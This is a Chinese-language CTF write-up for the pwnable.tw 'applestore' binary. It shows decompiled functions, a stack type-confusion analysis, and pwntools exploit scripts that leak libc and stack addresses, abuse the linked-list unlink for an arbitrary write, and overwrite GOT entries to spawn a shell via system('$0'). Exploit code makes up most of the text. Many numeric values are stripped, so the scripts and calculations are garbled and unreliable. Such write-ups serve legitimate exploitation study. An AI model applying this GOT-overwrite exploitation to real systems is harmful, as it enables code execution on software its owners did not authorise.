I is so vegetable:(,我tcl又由于忙于毕设和各种比赛各种耽误,到今天才真正把这题搞出来
存储结构
0x804B070链表头
struct _mycart_binlist
{
int *name; //ebp-0x20
int price; //ebp-0x1c
struct _mycart_binlist *next; //ebp-0x18
struct _mycart_binlist *pre; //ebp-0x14
}
insert
int __cdecl insert(int a1)
{
int result; // eax
_DWORD *i; // [esp+Ch] [ebp-4h] for ( i = &myCart; i[]; i = (_DWORD *)i[] )
;
i[] = a1; // the_last_mycart->next=inserted
result = a1;
*(_DWORD *)(a1 + ) = i; // inserted->pre=the_last_mycart
return result;
}
checkout
unsigned int checkout()
{
int v1; // [esp+10h] [ebp-28h]
char *v2; // [esp+18h] [ebp-20h]
int v3; // [esp+1Ch] [ebp-1Ch]
unsigned int v4; // [esp+2Ch] [ebp-Ch] v4 = __readgsdword(0x14u);
v1 = cart();
if ( v1 == )
{
puts("*: iPhone 8 - $1");
asprintf(&v2, "%s", "iPhone 8");
v3 = ; // price=1
insert((int)&v2);
v1 = ;
}
printf("Total: $%d\n", v1);
puts("Want to checkout? Maybe next time!");
return __readgsdword(0x14u) ^ v4;
}
这里存在问题的应该是checkout的insert,用贪心的思想求解下v1=7174各个商品的数量
*=
*=
*=
*=
*=
*=
*=
*=
*=
*= -*=
100x+200y+300z= =>x+2y+3z=
x+y+z=
=>y+2z=
y= z=
x= c=
199x 299y 399z 499c
写个脚本验证下
from pwn import * context.log_level='DEBUG' p=process('./applestore') def add(idx):
p.sendlineafter('>','2')
p.sendlineafter('Device Number> ',str(idx)) for i in range(0,18):
add(1)
add(2)
for i in range(0,2):
add(4)
for i in range(0,5):
add(3) gdb.attach(p,gdbscript='b *0x08048B98\n') p.interactive()
这里存在的问题是delete时执行my_read直接在栈中保存输入的字符串引起一个类型混淆,利用delete双向链表的断链操作DWORD_SHOOT得到一个任意地址写的机会,修改GOT即可导致任意代码执行。
unsigned int delete()
{
signed int idx; // [esp+10h] [ebp-38h]
_DWORD *v2; // [esp+14h] [ebp-34h]
int delete_obj; // [esp+18h] [ebp-30h]
int next; // [esp+1Ch] [ebp-2Ch]
int pre; // [esp+20h] [ebp-28h]
char nptr; // [esp+26h] [ebp-22h]
unsigned int v7; // [esp+3Ch] [ebp-Ch] v7 = __readgsdword(0x14u);
idx = ;
v2 = (_DWORD *)dword_804B070;
printf("Item Number> ");
fflush(stdout);
my_read(&nptr, 0x15u); // 栈里边直接保存输入的字符串,虽然不会溢出,但这里会造成类型混淆
delete_obj = atoi(&nptr);
while ( v2 )
{
if ( idx == delete_obj )
{
next = v2[]; // next
pre = v2[]; // pre
if ( pre )
*(_DWORD *)(pre + ) = next; // victim->pre->next=victim->next
if ( next )
*(_DWORD *)(next + ) = pre; // victim->next->pre=victim->pre
printf("Remove %d:%s from your shopping cart.\n", idx, *v2);
return __readgsdword(0x14u) ^ v7;
}
++idx;
v2 = (_DWORD *)v2[];
}
return __readgsdword(0x14u) ^ v7;
}
这里引起类型混淆的本质原因是我们执行checkout插入的V2距离ebp为EBP-20H,执行完checkout只是抬高栈帧,并不会销毁函数栈;而此时我们调用delete,会在调用checkout结束的位置开辟栈帧,这样得到的函数栈就和checkout的函数栈重叠,而delete会在栈中直接保存输入的字符串(EBP-22H的位置),就会引起一次类型混淆
handler ebp___ 38h esp__
checkout ebp__ delete ebp__ 38h 48h
V2=ebp-20h nptr=ebp-22h esp__ esp__
DWORD_SHOT并不可行,如果我们如下构造struct执行DWORD_SHOT的话,虽然GOT表可写,但是由于双向链表断链过程会执行victim->pre=victim->next,即read@got会写入*system@got+12的位置,而*system@got+12位于libc text段,肯定不可写,这里会崩溃。
struct
{
*name => padding
price => padding
*nexe => read@got
*pre => system@got
}
以下脚本可以验证DWORD_SHOT不可行。so,how to get it pwned?
from pwn import * context.log_level='DEBUG' p=process('./applestore')
elf=ELF('./applestore')
libc=ELF('/lib/i386-linux-gnu/libc-2.28.so') def add(idx):
p.sendlineafter('>','')
p.sendlineafter('Device Number> ',str(idx)) def delete(idx):
p.sendlineafter('>','')
p.sendlineafter('Item Number>',str(idx)) def checkout():
p.sendlineafter('>','')
p.sendlineafter('>','y') def cart(payload):
p.sendlineafter('>','')
p.sendlineafter('>',str(payload)) for i in range(,):
add()
add()
for i in range(,):
add()
for i in range(,):
add() checkout() payload='y\x0a'+p32(elf.got['read'])+p32()+p32()+p32()
cart(payload)
p.recvuntil('27: ')
read_got=u32(p.recv())
libc_base=read_got-libc.sym['read']
success('libc_base:'+hex(libc_base))
success('read_got:'+hex(read_got)) #gdb.attach(p,gdbscript='b *0x08048B98\n') #b insert()
gdb.attach(p,gdbscript='''
b *0x080489F0
break *0x080489FB if $[$ebp-0x38]==
''') #b delete_obj sys_got=libc_base+libc.sym['system']
success('system:'+hex(sys_got))
payload='\x32\x37\x00\x20'+'b'*+p32(read_got-)+p32(sys_got)
delete(payload) #gdb.attach(p,gdbscript='b *0x080489FB\n') p.interactive()
由于delete中我们有一次任意地址写的机会,而在执行完delete返回到handler时会再次引用栈内存ebp-0x22(在这个位置读入),所以我们考虑修改ebp的值,进而覆盖asprintf@got和atoi@got(这两个got的地址是相邻的),asprintf@got覆盖成'$0\x00\x00‘(4字节),atoi@got覆盖成sys_addr即可。这样在0x8048c16执行atoi时即执行system('$0')即可getshell
from pwn import * context.log_level='DEBUG' elf=ELF('./applestore')
local=
if local:
p=process('./applestore')
libc=ELF('/lib/i386-linux-gnu/libc-2.28.so')
else:
p=remote('chall.pwnable.tw',)
libc=ELF('./libc_32.so.6') def add(idx):
p.sendlineafter('>','')
p.sendlineafter('Device Number> ',str(idx)) def delete(idx):
p.sendlineafter('>','')
p.sendlineafter('Item Number>',str(idx)) def checkout():
p.sendlineafter('>','')
p.sendlineafter('>','y') def cart(payload):
p.sendlineafter('>','')
p.sendlineafter('>',str(payload)) for i in range(,):
add()
add()
for i in range(,):
add()
for i in range(,):
add() checkout() payload='y\x0a'+p32(elf.got['read'])+p32()+p32()+p32()
cart(payload)
p.recvuntil('27: ')
read_got=u32(p.recv())
libc.address=read_got-libc.sym['read']
env=libc.sym['environ']
success('libc_base:'+hex(libc.address))
success('read_got:'+hex(read_got)) payload='y\x0a'+p32(env)+p32()+p32()+p32()
cart(payload)
p.recvuntil('27: ')
stack_env=u32(p.recv())
success('stack_env:'+hex(stack_env))
ebp=stack_env-0x104
success('stack_ebp:'+hex(ebp)) asprintf_got=elf.got['asprintf']
atoi_got=elf.got['atoi']
sys=libc.sym['system']
payload=''+p32(sys)+p32()+p32(ebp-)+p32(asprintf_got+0x22) if local:
gdb.attach(p,gdbscript='''
b *0x080489F0\n
b *0x08048A6F\n
b *0x8048c0b\n
''')
pause()
delete(payload) p.recvuntil('from your shopping cart.')
payload='$0\x00\x00'+p32(sys)
p.sendline(payload) p.interactive()